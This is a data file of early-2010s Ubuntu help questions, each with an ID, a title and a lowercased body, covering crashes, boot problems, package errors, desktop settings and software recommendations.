13035	how to access gnu xnee	i have installed gnu xnee ( gnee an os x automator alternative ) from the software centre but now i cant find it anywhere in the menus . here is the output when i run gnee in the terminal gaurav @ gaurav-hcl-me-laptop : ~ $ gnee ( gnee:6864 ) : gtk-warning ** : gtkspinbutton : setting an adjustment with non-zero page size is deprecated ( gnee:6864 ) : gtk-warning ** : gtkspinbutton : setting an adjustment with non-zero page size is deprecated ( gnee:6864 ) : gtk-warning ** : gtkspinbutton : setting an adjustment with non-zero page size is deprecated ( gnee:6864 ) : gtk-warning ** : gtkspinbutton : setting an adjustment with non-zero page size is deprecated ( gnee:6864 ) : gtk-warning ** : gtkspinbutton : setting an adjustment with non-zero page size is deprecated ( gnee:6864 ) : gtk-warning ** : gtkspinbutton : setting an adjustment with non-zero page size is deprecated ( gnee:6864 ) : gtk-warning ** : gtkspinbutton : setting an adjustment with non-zero page size is deprecated ( gnee:6864 ) : gtk-warning ** : gtkspinbutton : setting an adjustment with non-zero page size is deprecated ( gnee:6864 ) : gtk-warning ** : gtkspinbutton : setting an adjustment with non-zero page size is deprecated ( gnee:6864 ) : gtk-warning ** : gtkspinbutton : setting an adjustment with non-zero page size is deprecated *** glibc detected *** gnee : free ( ) : invalid next size ( fast ) : 0x08afb638 *** ======= backtrace : ========= /lib/libc.so.6 ( +0x6c501 ) [ 0x53de501 ] /lib/libc.so.6 ( +0x6dd70 ) [ 0x53dfd70 ] /lib/libc.so.6 ( cfree+0x6d ) [ 0x53e2e5d ] gnee [ 0x804c9f5 ] /lib/libc.so.6 ( __libc_start_main+0xe7 ) [ 0x5388ce7 ] gnee [ 0x804c571 ] ======= memory map : ======== 00110000-00112000 r-xp 00000000 08:01 2755679 /usr/lib/libgmodule-2.0.so.0.2600.0 00112000-00113000 r -- p 00002000 08:01 2755679 /usr/lib/libgmodule-2.0.so.0.2600.0 00113000-00114000 rw-p 00003000 08:01 2755679 /usr/lib/libgmodule-2.0.so.0.2600.0 00116000-0011a000 r-xp 00000000 08:01 2755370 /usr/lib/libxtst.so.6.1.0 0011a000-0011b000 r -- p 00003000 08:01 2755370 /usr/lib/libxtst.so.6.1.0 0011b000-0011c000 rw-p 00004000 08:01 2755370 /usr/lib/libxtst.so.6.1.0 0011c000-00176000 r-xp 00000000 08:01 2755432 /usr/lib/libbonoboui-2.so.0.0.0 00176000-00177000 r -- p 00059000 08:01 2755432 /usr/lib/libbonoboui-2.so.0.0.0 00177000-00179000 rw-p 0005a000 08:01 2755432 /usr/lib/libbonoboui-2.so.0.0.0 00179000-001c8000 r-xp 00000000 08:01 2755428 /usr/lib/libbonobo-2.so.0.0.0 001c8000-001c9000 -- -p 0004f000 08:01 2755428 /usr/lib/libbonobo-2.so.0.0.0 001c9000-001cc000 r -- p 0004f000 08:01 2755428 /usr/lib/libbonobo-2.so.0.0.0 001cc000-001d3000 rw-p 00052000 08:01 2755428 /usr/lib/libbonobo-2.so.0.0.0 001d3000-00200000 r-xp 00000000 08:01 2754521 /usr/lib/libgconf-2.so.4.1.5 00200000-00201000 -- -p 0002d000 08:01 2754521 /usr/lib/libgconf-2.so.4.1.5 00201000-00202000 r -- p 0002d000 08:01 2754521 /usr/lib/libgconf-2.so.4.1.5 00202000-00204000 rw-p 0002e000 08:01 2754521 /usr/lib/libgconf-2.so.4.1.5 00204000-0021c000 r-xp 00000000 08:01 2755405 /usr/lib/libatk-1.0.so.0.3209.1 0021c000-0021d000 -- -p 00018000 08:01 2755405 /usr/lib/libatk-1.0.so.0.3209.1 0021d000-0021e000 r -- p 00018000 08:01 2755405 /usr/lib/libatk-1.0.so.0.3209.1 0021e000-0021f000 rw-p 00019000 08:01 2755405 /usr/lib/libatk-1.0.so.0.3209.1 0021f000-00243000 r-xp 00000000 08:01 2756035 /usr/lib/libpangoft2-1.0.so.0.2800.1 00243000-00244000 r -- p 00023000 08:01 2756035 /usr/lib/libpangoft2-1.0.so.0.2800.1 00244000-00245000 rw-p 00024000 08:01 2756035 /usr/lib/libpangoft2-1.0.so.0.2800.1 00245000-00248000 r-xp 00000000 08:01 393403 /lib/libuuid.so.1.3.0 00248000-00249000 r -- p 00002000 08:01 393403 /lib/libuuid.so.1.3.0 00249000-0024a000 rw-p 00003000 08:01 393403 /lib/libuuid.so.1.3.0 0024a000-0024c000 r-xp 00000000 08:01 2755415 /usr/lib/libavahi-glib.so.1.0.2 0024c000-0024d000 r -- p 00001000 08:01 2755415 /usr/lib/libavahi-glib.so.1.0.2 0024d000-0024e000 rw-p 00002000 08:01 2755415 /usr/lib/libavahi-glib.so.1.0.2 0024e000-00250000 r-xp 00000000 08:01 393661 /lib/libutil-2.12.1.so 00250000-00251000 r -- p 00001000 08:01 393661 /lib/libutil-2.12.1.so 00251000-00252000 rw-p 00002000 08:01 393661 /lib/libutil-2.12.1.so 00254000-00255000 r-xp 00000000 00:00 0 [ vdso ] 00255000-0026c000 r-xp 00000000 08:01 2755647 /usr/lib/libgdk_pixbuf-2.0.so.0.2200.0 0026c000-0026d000 r -- p 00017000 08:01 2755647 /usr/lib/libgdk_pixbuf-2.0.so.0.2200.0 0026d000-0026e000 rw-p 00018000 08:01 2755647 /usr/lib/libgdk_pixbuf-2.0.so.0.2200.0 0026e000-002ad000 r-xp 00000000 08:01 2756031 /usr/lib/libpango-1.0.so.0.2800.1 002ad000-002ae000 -- -p 0003f000 08:01 2756031 /usr/lib/libpango-1.0.so.0.2800.1 002ae000-002af000 r -- p 0003f000 08:01 2756031 /usr/lib/libpango-1.0.so.0.2800.1 002af000-002b0000 rw-p 00040000 08:01 2756031 /usr/lib/libpango-1.0.so.0.2800.1 002b0000-002be000 r-xp 00000000 08:01 2755342 /usr/lib/libxext.so.6.4.0 002be000-002bf000 r -- p 0000d000 08:01 2755342 /usr/lib/libxext.so.6.4.0 002bf000-002c0000 rw-p 0000e000 08:01 2755342 /usr/lib/libxext.so.6.4.0 002c0000-002c4000 r-xp 00000000 08:01 2755317 /usr/lib/liborbitcosnaming-2.so.0.1.0 002c4000-002c5000 r -- p 00003000 08:01 2755317 /usr/lib/liborbitcosnaming-2.so.0.1.0 002c5000-002c6000 rw-p 00004000 08:01 2755317 /usr/lib/liborbitcosnaming-2.so.0.1.0 002c7000-002d9000 r-xp 00000000 08:01 2755430 /usr/lib/libbonobo-activation.so.4.0.0 002d9000-002da000 r -- p 00012000 08:01 2755430 /usr/lib/libbonobo-activation.so.4.0.0 002da000-002db000 rw-p 00013000 08:01 2755430 /usr/lib/libbonobo-activation.so.4.0.0 002db000-002dc000 rw-p 00000000 00:00 0 002dc000-00370000 r-xp 00000000 08:01 2755645 /usr/lib/libgdk-x11-2.0.so.0.2200.0 00370000-00372000 r -- p 00094000 08:01 2755645 /usr/lib/libgdk-x11-2.0.so.0.2200.0 00372000-00373000 rw-p 00096000 08:01 2755645 /usr/lib/libgdk-x11-2.0.so.0.2200.0 00373000-0038d000 r-xp 00000000 08:01 2755689 /usr/lib/libgnome-keyring.so.0.1.1 0038d000-0038e000 r -- p 00019000 08:01 2755689 /usr/lib/libgnome-keyring.so.0.1.1 0038e000-0038f000 rw-p 0001a000 08:01 2755689 /usr/lib/libgnome-keyring.so.0.1.1 0038f000-00395000 r-xp 00000000 08:01 2755619 /usr/lib/libgailutil.so.18.0.1 00395000-00396000 r -- p 00005000 08:01 2755619 /usr/lib/libgailutil.so.18.0.1 00396000-00397000 rw-p 00006000 08:01 2755619 /usr/lib/libgailutil.so.18.0.1 00397000-003ac000 r-xp 00000000 08:01 2755300 /usr/lib/libice.so.6.3.0 003ac000-003ad000 r -- p 00014000 08:01 2755300 /usr/lib/libice.so.6.3.0 003ad000-003ae000 rw-p 00015000 08:01 2755300 /usr/lib/libice.so.6.3.0 003ae000-003b0000 rw-p 00000000 00:00 0 003b0000-003f0000 r-xp 00000000 08:01 2755715 /usr/lib/libgobject-2.0.so.0.2600.0 003f0000-003f1000 r -- p 00040000 08:01 2755715 /usr/lib/libgobject-2.0.so.0.2600.0 003f1000-003f2000 rw-p 00041000 08:01 2755715 /usr/lib/libgobject-2.0.so.0.2600.0 003f2000-0040f000 r-xp 00000000 08:01 2755524 /usr/lib/libdbus-glib-1.so.2.1.0 0040f000-00410000 r -- p 0001c000 08:01 2755524 /usr/lib/libdbus-glib-1.so.2.1.0 00410000-00411000 rw-p 0001d000 08:01 2755524 /usr/lib/libdbus-glib-1.so.2.1.0 00411000-00413000 r-xp 00000000 08:01 2755352 /usr/lib/libxinerama.so.1.0.0 00413000-00414000 r -- p 00001000 08:01 2755352 /usr/lib/libxinerama.so.1.0.0 00414000-00415000 rw-p 00002000 08:01 2755352 /usr/lib/libxinerama.so.1.0.0 00416000-0045f000 r-xp 00000000 08:01 2755313 /usr/lib/liborbit-2.so.0.1.0 0045f000-00467000 r -- p 00049000 08:01 2755313 /usr/lib/liborbit-2.so.0.1.0 00467000-00469000 rw-p 00051000 08:01 2755313 /usr/lib/liborbit-2.so.0.1.0 00469000-00551000 r-xp 00000000 08:01 2755661 /usr/lib/libgio-2.0.so.0.2600.0 00551000-00553000 r -- p 000e7000 08:01 2755661 /usr/lib/libgio-2.0.so.0.2600.0 00553000-00554000 rw-p 000e9000 08:01 2755661 /usr/lib/libgio-2.0.so.0.2600.0 00554000-00555000 rw-p 00000000 00:00 0 00555000-00578000 r-xp 00000000 08:01 393365 /lib/libpng12.so.0.44.0 00578000-00579000 r -- p 00022000 08:01 393365 /lib/libpng12.so.0.44.0 00579000-0057a000 rw-p 00023000 08:01 393365 /lib/libpng12.so.0.44.0 0057d000-0057f000 r-xp 00000000 08:01 393656 /lib/libdl-2.12.1.so 0057f000-00580000 r -- p 00001000 08:01 393656 /lib/libdl-2.12.1.soaborted
13036	can not install kubuntu	i have a emachines e525 laptop and i 'm trying to install kubuntu 10.10 on it . i 've downloaded the iso image from the website , burned it to a cd , inserted the cd into the emachines laptop and when i boot from it i just get : isolinux 4.01 debian-20100714 etcd copyright ( c ) 1994-2010 h. peter anvin et al and that is all . it just hangs here . no menu to install it no nothing . the cd is working fine on my other laptop . any ideas ? le : no message at all . black screen showing at the top of the screen what i typed above . specs : intel celeron 2.2ghz 3gb ddr2 250gb hdd mobile intel gl40 express chipset le2 : just tried a old cd with ubuntu 8.04 and this boots , : ( so is this related just to kubuntu ? do n't both use the same boot loader ? or maybe 10.10 uses a newer version of the boot loader that has issues ... ?
13041	how do i watch sopcast channels ?	how to watch sopcast channels from ubuntu ?
13043	search function not working correctly in nautilus-elementary ?	how do i search using nautilus-elementary ? as soon as i click the magnifying glass , the list of files in the folder i 'm trying to search disappears and tabs for sourcecode , video and image appear ( already with some results ) . changing the option that defaults to 'this week ' does n't seem to help at all either . am i missing something seriously basic here ? all i want to do is a simple search within the folder or drive i 've got open in nautilus . any help much appreciated .
13047	why there 's no usb support in virtualbox ubuntu edition ?	why does virtualbox from the ubuntu repositories not support usb ? ( while the official release does support it ? )
13050	ubuntu studio login screen missing ?	just upgraded my machine to ubuntu studio ( 10.10 ) , and am starting to learn my way around . one thing i noticed off-the-bat is that the gdm login screen promoted on the studio site is missing ( http : //ubuntustudio.org/files/us3.png ) anyone know how i can get/find/activate it ? thanks in advance !
13052	how to remove a duplicate ubuntu installation without ruining os boot menu	i have a dual boot setup : windows vista and ubuntu . but , i actually have a duplicate ubuntu install that i setup a long time ago to get my bootmenu back ... ( my computer at one point could not find the boot record because i was playing around with the partitions.. i could n't start the computer , had to install new ubuntu , and my boot menu came back ) . so i want to get rid of this duplicate ubuntu install without having the same problem again where i can not get the boot menu . the duplicate install is what caused my boot menu to appear again so thinking that they are connected . thanks .
13053	how do i make empathy use the system proxy settings ?	i want to use empathy which is provided by default with ubuntu 10.10 . unfortunately , it seems unable to take account of the proxy settings i applied system-wide . on the contrary , other programs are able to connect to the internet , like for example pidgin . is there any solution to make empathy also use my proxy settings ?
13061	why do i have to enter my password twice when changing proxy settings ?	when i change the proxy settings and apply them system-wide , i always have to enter my super-user password , as anyone could expect . however , i have to do that twice : once for `` proxy settings '' and another time for `` gconf '' . how do i set this up so that i have to enter my password only once ?
13063	how to remove windows partition and install fedora 14 ?	i currently have a dual-boot setup with ubuntu and windows . now i would like to remove the windows partition which is 150gb and install fedora 14 . in other words , i want to be able to dual-boot ubuntu and fedora .
13065	how do i fix the gpg error `` no_pubkey '' ?	i added some extra repositories with the software sources program . but when i reload the package database , i get an error like the following : gpg error [ ... ] no_pubkey [ ... ] i know i can fix it using apt-key in a terminal , according to the official ubuntu documentation . but i would have liked to do it graphically . is there a mean not to open a terminal ?
13070	errors on apt-get update	i am getting few errors when i run the command sudo apt-get update here is the output of errors only . err http : //ppa.launchpad.net maverick/main sources 404 not found err http : //ppa.launchpad.net maverick/main i386 packages 404 not found fetched 2,457b in 5min 5s ( 8b/s ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/maverick-security/main/source/sources.gz hash sum mismatch w : failed to fetch http : //ppa.launchpad.net/nanny/ppa/ubuntu/dists/maverick/main/source/sources.gz 404 not found w : failed to fetch http : //ppa.launchpad.net/nanny/ppa/ubuntu/dists/maverick/main/binary-i386/packages.gz 404 not found w : failed to fetch http : //ppa.launchpad.net/quickly/ppa/ubuntu/dists/maverick/main/source/sources.gz 404 not found w : failed to fetch http : //ppa.launchpad.net/quickly/ppa/ubuntu/dists/maverick/main/binary-i386/packages.gz 404 not found e : some index files failed to download , they have been ignored , or old ones used instead . i added the quickly-ppa but i cant find it in the sources list and getting error .
13071	how can i read every dvd , even if encrypted by css or other ?	i sometimes want to use my computer as a dvd-player . unfortunately i know that i will often have to cope with encrypted dvds , for example with css . therefore i installed the libdvdcss2 library from medibuntu . but from now on , how can i be sure i will be able to read any dvd whatever its encryption , may it be css or another protection ? by the way , i precise that passing through such protective measures is allowed in my country , `` for interoperability purposes '' .
13072	my isp imposes smtp restrictions on outgoing mail , is it possible to configure a system wide smtp address ?	my isp imposes smtp restrictions on outgoing mail , is it possible to configure a system wide smtp address to use , instead of having to configure each mail client individually ?
13073	is unity just a plugin of compiz	i have read that unity would be a plugin of compiz . does it mean that when i uncheck unity from the ccsm menu , i would be greeted with conventional gnome or may be gnome shell .
13076	orkut ( gmail ) - google talk chat program	i am new to ubuntu , and ca n't find google talk for ubuntu , how can i use chat on orkut.com which uses gmail sign in programme and i use google talk to chat on windows .
13077	is ~/.profile sourced by bash ?	i 'm trying to create a global counter variable to see how many times ~/.profile gets executed . thus : in ~/.bashrc : # ... if [ `` $ profile_exec_times '' = `` '' ] ; then export profile_exec_times=0 fi let `` profile_exec_times += 1 '' in ~/.profile : # ... export profile_exec_times let `` profile_exec_times += 1 '' but when i open a new shell and write echo $ profile_exec_times , all i get is 1 . $ profile_exec_times must be at least 2 . i suspect that ~/.profile is n't sourced by bash ... if so , what i need to do in order to check how many times ~/.profile is executed ? edit : i 've noticed that /etc/gdm/xsession is sourcing ~/.profile by the following line : test -f `` $ home/.profile '' & & . `` $ home/.profile '' and ~/.bashrc is sourced in ~/.profile by the following lines : # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi also , i 've add the following line to ~/.bashrc & ~/.profile : echo $ ( cd $ { 0 % /* } & & echo $ pwd/ $ { 0 # # */ } ) > > /home/myusername/a and could see that only one line was added to the file after i logged in to my user . i want to emphasize that my goal here is : finding out how many times ~/.profile is executed when user logs in . additional details : $ uname -a linux my-desktop 2.6.32-25-generic # 45-ubuntu smp sat oct 16 19:52:42 utc 2010 x86_64 gnu/linux $ cat /etc/*-release distrib_id=ubuntu distrib_release=10.04 distrib_codename=lucid distrib_description= '' ubuntu 10.04.1 lts '' my /etc/gdm/xsession my ~/.bashrc my ~/.profile
13079	can i use every .deb file , whatever my ubuntu version or architecture ?	sometimes i want to download programs that are not proposed in the software center but only on the developer 's website , like for example world of goo demo . but the website proposes only one .deb download link usable by ubuntu . is it possible for me to use this file , even if i use an old version of ubuntu or an architecture that still remains more or less exotic , as a 64-bit one ? if yes , can i encounter any difficulties running the program , once installed ?
13092	foss conference calling software	i have so far been using skype to do conference calls on ubuntu maverick . i want to stop using skype because the client looks pretty bad ( or has a number of minor bugs ) in the default ubuntu theme ( e.g . menu items do n't display unless you point at them ) , and it seems to use up a lot of my cpu while audio calling . are there any audio conferencing ( i.e . 2-10 people in a call simultaneously ) tools that are foss and work quite well in ubuntu ? edit : some additional requirements : 1 ) i want to have minimal setup and use open protocols if possible . 2 ) i need a s/w feature to record the call ( i 'm planning to make podcasts ) . 3 ) cross platform - the people i call may be on a difference os , so a suitable client should be available for their system too ( win/mac ) .
13103	burned cd-r are not identical to the input iso image , why ?	i have the issue that sometimes when i burn an iso image to a cd-r with : sudo wodim -v driveropts=burnfree -data dev=/dev/scd0 input.iso and then read it back out again with : sudo dd if=/dev/cdrom of=output.iso dd : reading `/dev/cdrom ' : input/output error ... that i end up with two iso images that are not identical , namely the output.iso is missing 2048 bytes at the end . when i however mount the iso image or cd-r and compare the actual files on the mountpoint , both are identical . is that expected behavior or is that an actually incorrect burn of the data ? and if its expected , how can i verify that the burn process was successful ? the reason why i ask in the first place is that it seems to be reproducible behavior , certain iso images come out 2048 bytes short , even on repeated burns , but all burned cd-rs are under themselves identical . also what is the reason behind the : dd : reading `/dev/cdrom ' : input/output error as it happens always , i assume it is normal , but what is the technical reason behind it ? i assume cds do n't allow the device to detect the size directly , so dd reads till it encounters the end the hard way . edit : user karol on superusers.com mentioned that both the size issue and the read error are the result of using -tao ( default ) in wodim instead of -dao mode . i could n't yet test it , but it sounds like the most plausible explanation so far .
13106	how can i install ubuntu on a headless machine ?	i have a headless storage server with preconfigured windows home server . how can i install ubuntu without a display ? do i have to build a custom install flash drive ? if so , what would be the basic procedure ? is there a program ( like unetbootin ) to do this ?
13108	map keyboard arrows to shortcuts	i type with all ten fingers so i 'm using alt + h ( j , k , l ) shortcuts in vim in insert mode to move cursor and it 's very cool : ) i would like to remap arrow keys in x ( gnome ) to use these shortcuts in all x applications so if i press alt+k it should work as up arrow . for self-torture : ) you can include these lines in your .gvimrc inoremap < left > < nop > inoremap < right > < nop > inoremap < up > < nop > inoremap < down > < nop > inoremap < a-h > < left > inoremap < a-j > < down > inoremap < a-k > < up > inoremap < a-l > < right >
13112	mono apps wo n't start because they ca n't load certain assemblies	here 's the output after trying to run banshee from terminal : jayjay @ jayjay-desktop : ~ $ banshee ** ( /usr/lib/banshee-1/banshee.exe:7909 ) : warning ** : the following assembly referenced from /usr/lib/banshee-1/banshee.services.dll could not be loaded : assembly : glib-sharp ( assemblyref_index=11 ) version : 2.12.0.0 public key : 35e10195dab3c99f the assembly was not found in the global assembly cache , a path listed in the mono_path environment variable , or in the location of the executing assembly ( /usr/lib/banshee-1/ ) . ** ( /usr/lib/banshee-1/banshee.exe:7909 ) : warning ** : could not load file or assembly 'glib-sharp , version=2.12.0.0 , culture=neutral , publickeytoken=35e10195dab3c99f ' or one of its dependencies . ** ( /usr/lib/banshee-1/banshee.exe:7909 ) : warning ** : the following assembly referenced from /usr/lib/banshee-1/banshee.services.dll could not be loaded : assembly : ndesk.dbus ( assemblyref_index=14 ) version : 1.0.0.0 public key : f6716e4f9b2ed099 the assembly was not found in the global assembly cache , a path listed in the mono_path environment variable , or in the location of the executing assembly ( /usr/lib/banshee-1/ ) . ** ( /usr/lib/banshee-1/banshee.exe:7909 ) : warning ** : could not load file or assembly 'ndesk.dbus , version=1.0.0.0 , culture=neutral , publickeytoken=f6716e4f9b2ed099 ' or one of its dependencies . stacktrace : native stacktrace : banshee-1 ( ) [ 0x80c9774 ] banshee-1 ( ) [ 0x80f5753 ] [ 0xb783d40c ] banshee-1 ( ) [ 0x80893db ] banshee-1 ( ) [ 0x8061698 ] banshee-1 ( ) [ 0x8062e78 ] banshee-1 ( ) [ 0x806374f ] banshee-1 ( mono_runtime_exec_main+0xde ) [ 0x8103e9e ] banshee-1 ( mono_runtime_run_main+0x15a ) [ 0x810461a ] banshee-1 ( mono_main+0x18c4 ) [ 0x80b2744 ] banshee-1 ( ) [ 0x805ad75 ] /lib/libc.so.6 ( __libc_start_main+0xe7 ) [ 0xb75b9ce7 ] banshee-1 ( ) [ 0x805acb1 ] debug info from gdb : could not attach to process . if your uid matches the uid of the target process , check the setting of /proc/sys/kernel/yama/ptrace_scope , or try again as the root user . for more details , see /etc/sysctl.d/10-ptrace.conf ptrace : operation not permitted . ================================================== =============== got a sigsegv while executing native code . this usually indicates a fatal error in the mono runtime or one of the native libraries used by your application . ================================================== =============== aborted
13114	how can i rename the radios i added to banshee ?	with banshee 1.8 you can add radio stations to the dedicated panel . the 'add a station ' button gives the possibility to indicate the stream address , a name , a genre and so on . however those informations seem to be given once and for all , as there is no 'edit station ' option in the contextual menu . so how can i modify the information associated to the saved stations , for example their name ?
13115	can i make openoffice.org recognize automatically the language i am writing in ?	i use to write a lot in many different languages , and i frequently use spelling checkers to correct my texts . but switching the settings manually each time is a loss of time . in firefox i have a very useful extension called dictionary switcher which automatically detects the language i am writing in and suggests corrections . does openoffice.org have an equivalent of this feature ? if yes , how do i install it and/or change the settings ?
13119	can not do temporary change in brightness	i mainly use my netbook for writing and browsing . so i have set the brightness to a minimum level . sometimes when i watch videos i increase the brightness using hotkeys . but when increased after few seconds it reverts back to the default level i have set . is there any way in which the brightness level i have set using hotkeys can be retained untill the machine is shutdown ?
13120	can i edit tags of a .flv file ?	in my video folder i have some music clips in .flv i would have liked to tag with information as artist , song title , album , cover , etc . is this operation possible ? which programs are able to do that graphically ( equivalent of easytag ) ?
13121	is this systemrestore available ?	i saw something similar in windows for ubuntu at https : //wiki.ubuntu.com/systemrestore . i was wondering if it has been available now ? thanks !
13131	why is there an 'about me ' panel ?	when i go to system - > preferences - > about me , i am able to give all sorts of informations , like my name , my e-mail address , an avatar , et căśtera . what is it made for ?
13133	how do i complete the gnome character map with missing unicode characters ?	i often use the gnome character map accessory to find characters i did n't know , with a view to surprising friends with exclusive drawings . however the program is not complete and lacks some characters like the mongol or the birman ones . how do i install all of them in one time ? notice that i do n't care what precise font it is .
13135	missing cd quality , lossy profile in preferred formats in rhythmbox	good evening all , i am having a problem with rhythmbox on ubuntu 10.10 . i freshly installed ubuntu almost a week ago and everything was great right off the bat . however , tonight i am having a small issue . in rhythmbox , i went into the preferences section and went to check the quality level of the the cd quality , lossy profile ( the ones that uses ogg ) and it is missing from the preferred formats list . if i click the edit button , i see it in the list of available profiles along with many others and it is set to active . why would it not be in the preferred formats list , and more importantly , how could i get it back in the preferred formats list so i can rip a cd with it ? just as a side note , rhythmbox is playing ogg files without problem . thanks for any help anyone can provide !
13137	is there a keyboard shortcut to open the indicator applet ?	how can i get here using keyboard shortcuts ?
13140	gnome panel and menu bar ca n't be clicked.. !	i am using ubuntu lucid lynx . i installed it using the feature 'install within windows ' . i got a simple though difficult problem . touch pad and external mouse movements are working fine . i am able to : maximize , minimize , close an opened window using the buttons on window . drag a window by double clicking and holding it . rise up a context menu with a right click on the window border . scroll through a page with the mouse wheel . i am not able to : left click or right click on a panel . open a menu item from the menu bar using click . open a folder by double clicking it . rise up a context menu for a right click inside the window area . click an item in side pane . scroll through a page dragging the scroll bar . select ok or cancel in the pop up windows by a click . [ to do so , i have to use tab to go the option and press enter ] . it happened as follows : i finished installing the packages planets , sugar-emulator , rlplot , gsynaptics , then opened the package planets , added a planet in the opened window . *the planets window said to press ctrl + shift to release mouse from its window to normal ubuntu environment . i doubt my keystroke was wrong . i am not sure what i pressed . something wrong went from there . * i thought a restart would clear the problem , but it did n't . i removed all the installed packages and their dependencies , restarted my laptop . still , the problem exists . i am using my laptop with all the keyboard shortcuts i know . and i have to press tab many times to select something and it is really bad . solution ? should i install any drivers for my touch pad ? is there any option to restore my system to an earlier point of time as is possible in windows ? should i change any settings ? can i recovery using any boot up installation ?
13141	how to turn off the automatic lock ?	i want ubuntu to ask for my password when i log in but not lock me every time i am away for 5 minutes . how can i disable the automatic lock ?
13142	can not sign into gmail , all other websites are opening	the following error shows every time i sign into gmail . on the contrary , i can open gmail in windows . the connection has timed out the server at www.google.com is taking too long to respond . the site could be temporarily unavailable or too busy . try again in a few moments . if you are unable to load any pages , check your computer 's network connection . if your computer or network is protected by a firewall or proxy , make sure that firefox is permitted to access the web . please help .
13144	can i use the ubuntu font in a commercial logo design ?	i 've been looking into using the ubuntu typeface for a logo . the logo is for a web site unrelated to ubuntu and open source software . i 'm wondering whether the license allows this , and if so , whether there are any limitations ?
13150	adjust resolution on ubuntu server 10.04 ?	installed ubuntu server 10.04 on an old laptop and i noticed that the system is trying to show the cli below my screen . this means that if i run a script or a program with a bunch of output , once it is done , i have to press return several times to bring the output to the point where i can actually see it on the screen . i also have to clear the screen to be able to see what i am typing at the current command prompt . the laptop is an elitegroup 536s with a native screen resolution of 1024 x 768 how can i adjust the resolution for ubuntu server 10.04 ? what file do i need to edit if editing a file is the solution ? i 've seen posts on how to change the resolution on the desktop version of ubuntu but not the server version .
13154	system -- > preferences -- > visual effects boots to none	when i boot -- in system -- > preferences -- > visual effects it always boots to none . i change it to extra or custome but it wont stay there it reterns back to none @ next boot time . also after i set it to extra or custom and close the window and opening visual effects again it shows it it is set to normal . any ideas ? odly 9x ubuntu did not do this 10.04 & 10.10 were afresh installs . gpu integarated geforce 8300 memory:512 mb memory interface:128-bit 3d-accelerated proprietary graphics driver for nvidia cards . nvidia driver version : 260.19.06
13157	ibus client for gnu emacs : installed , but how do i start it ?	having recently moved to linux/ubuntu , i 'm looking for a good editor , and gnu emacs seems to fit the bill . one thing i want from a text editor is the ability to handle unicode input method editors in a `` normal way '' , across the board . for ubuntu , the `` normal way '' is via ibus . however , emacs does not support ibus `` off the shelf '' . i found a launchpad project : ibus client for gnu emacs : ibus-el . i 've installed ibus-el and set it up as per the customize section of this emacswiki ibusmode page . i included the suggested `` toggle '' keybinding : ; ; use s-spc to toggle input status it seems to have installed okay , but i have no idea how to invoke ibus and switch imes . s-spc does n't fire up the ibus language panel ... i 'm stuck : ( ... so close , yet so far ... . here are the startup *messages* loading 00debian-vars ... no /etc/mailname . reverting to default ... loading 00debian-vars ... done loading /etc/emacs/site-start.d/50autoconf.el ( source ) ... done loading /etc/emacs/site-start.d/50dictionaries-common.el ( source ) ... loading debian-ispell ... loading /var/cache/dictionaries-common/emacsen-ispell-default.el ( source ) ... done loading debian-ispell ... done loading /var/cache/dictionaries-common/emacsen-ispell-dicts.el ( source ) ... done loading /etc/emacs/site-start.d/50dictionaries-common.el ( source ) ... done loading /etc/emacs/site-start.d/50festival.el ( source ) ... done loading /etc/emacs/site-start.d/50gtk-doc-tools.el ( source ) ... done loading /etc/emacs/site-start.d/50ibus-el.el ( source ) ... done ibus : xlib.protocol.request.queryextension ibus : agent successfully started for display `` :0.0 ''
13163	smc2632w wireless pcmcia card ?	i have an old toshiba laptop with a smc2632w wireless pcmcia card . unable to connect to a network under ubuntu 7.10 ( using wubi as it can not boot from a cd ) , however it works in windows xp . how can i get this working ?
13166	how to enable multitouch for a trackpad ?	i have eeepc 1005ha , and want to have the ability to enlarge and scroll down/up/left/right with the pad , is it possible ?
13170	how do i make nautilus use preview thumbnails for openoffice.org documents ?	in nautilus by default i have very nice default previews of different file types , for example jpeg , png , svg , text or pdf . is it possible to make nautilus show preview thumbnails also of openoffice.org documents ?
13172	multiple tomcat instance	is there a proper way to run more than one tomcat instance on an ubuntu server ? i 've done some searching and found two options : download a zipped tomcat and manually deploy it . the obvious con is that it wo n't be upgraded using apt-get . use some advanced scripting , which is dangerous in a production server . any other ideas to cleanly run another instance ? thanks in advance , adam
13177	how do i recover data from an encrypted home directory	i opted to encrypt my home during install , and now i would like to access my data from a livecd , unfortunately i 'm having trouble following these instructions . i get the error `` mounting ecryptfs : [ -2 ] no such file or directory ''
13179	how to start a new project and host it at launchpad.net ?	i 'm planning to start a new project . however , i ca n't find a really simple documentation to getting started with launchpad.net . what should i do to create a new project ? i will appreciate any kind of suggestion of good documentation . so feel free to give all your help answering the following . thanks !
13180	side chain in ardour	can someone familiar with ardour 2.8 please make a video / youtube guide showing precisely how to use sc3 side chain compression ? i 've read every guide online currently and side chain is simply not working , very frustrating . http : //ardour.org/node/1013 seems to be the main one people go by , however when i have the sends coming into the bus there is simply no effect from sc3 . thank you for your time . here is another relevant thread : http : //ardour.org/node/3882
13181	how do i record internet radio stream from banshee ?	maybe present some extension ? ? i have use banshee 1.9.0
13184	how to use virtualbox as a sqlserver host ?	i installed windows server 2008 and sql server 2008 on virtualbox , now i want to remotely connect to it via php . i do n't know what kind of network connection is needed , how to set it and ...
13197	how to program a status icon that will display in ubuntu as well as in other distributions ?	the application in question does some action ( here connecting audio to network streams ) and runs minimized if these actions were successful . therefore a status icon is needed to display the state of the connection ( e.g . connected/disconnected ) . only when clicking the icon the application window will open to give access to further options . using python 2.6 and pygtk i conveniently realised this by using gtk_status_icon . i deliberately wrote the application to run on as many distributions as possible including the various ubuntu versions . i took care to use possible dependencies only after the user had installed them . however now i hear that gtk_status_icon will no longer be supported in future ubuntu releases . developers are asked to use application indicators instead . what is then best practise to make sure that : the application 's local icons are displayed properly the application will still run and display it 's icons in future ubuntu releases . the application will also run and display it 's icons in other environments where indicator-applet , libappindicator , and python-appindicator are not provided . application indicator fallback mechanisms to gtk_status_icon wo n't work if indicator-applet is not running . python interpreters will not run if there was no appindicator module to import from . do i need to develop different versions for different distributions or is there a better way to come around this . where do i find a documentation on how to use applicationindicator other than in the example given in ubuntu wiki ? what commands are provided to check if indicator-applet is running to avoid programming different source codes for ubuntu vs. non-ubuntu distributions ?
13200	password protect single drive	i have four drives . i want that whenever user tries to mount drive it should ask for password . i know password protecting all drives is possible through user previlages but i dont want it for all drives . i want it for single drive .
